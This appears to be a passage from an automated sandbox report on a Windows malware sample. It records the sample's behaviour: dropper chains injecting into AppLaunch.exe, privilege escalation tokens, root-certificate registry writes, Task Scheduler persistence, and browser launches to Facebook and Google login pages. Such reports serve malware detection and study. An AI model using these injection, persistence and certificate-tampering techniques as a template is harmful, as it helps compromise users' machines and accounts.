26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\ss41.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\ss41.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5524.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\PA Previewer\previewer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2288 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2476 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2492 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 2132 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe C:\Windows\SysWOW64\WerFault.exe
PID 1196 wrote to memory of 2664 N/A N/A C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 2664 N/A N/A C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 2664 N/A N/A C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2664 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2664 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2928 wrote to memory of 268 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2928 wrote to memory of 268 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2928 wrote to memory of 268 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2928 wrote to memory of 268 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2664 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2664 wrote to memory of 660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 660 wrote to memory of 2204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 660 wrote to memory of 2204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 660 wrote to memory of 2204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 660 wrote to memory of 2204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\5043.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe

"C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a1118625.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 280

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\3F9F.bat" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2928 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\5043.exe

C:\Users\Admin\AppData\Local\Temp\5043.exe

C:\Users\Admin\AppData\Local\Temp\ss41.exe

"C:\Users\Admin\AppData\Local\Temp\ss41.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\5524.exe

C:\Users\Admin\AppData\Local\Temp\5524.exe

C:\Users\Admin\AppData\Local\Temp\5AFF.exe

C:\Users\Admin\AppData\Local\Temp\5AFF.exe

C:\Users\Admin\AppData\Local\Temp\5D03.exe

C:\Users\Admin\AppData\Local\Temp\5D03.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\kos1.exe

"C:\Users\Admin\AppData\Local\Temp\kos1.exe"

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\kos.exe

"C:\Users\Admin\AppData\Local\Temp\kos.exe"

C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp" /SL4 $60266 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1232936 52224

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 528

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 8

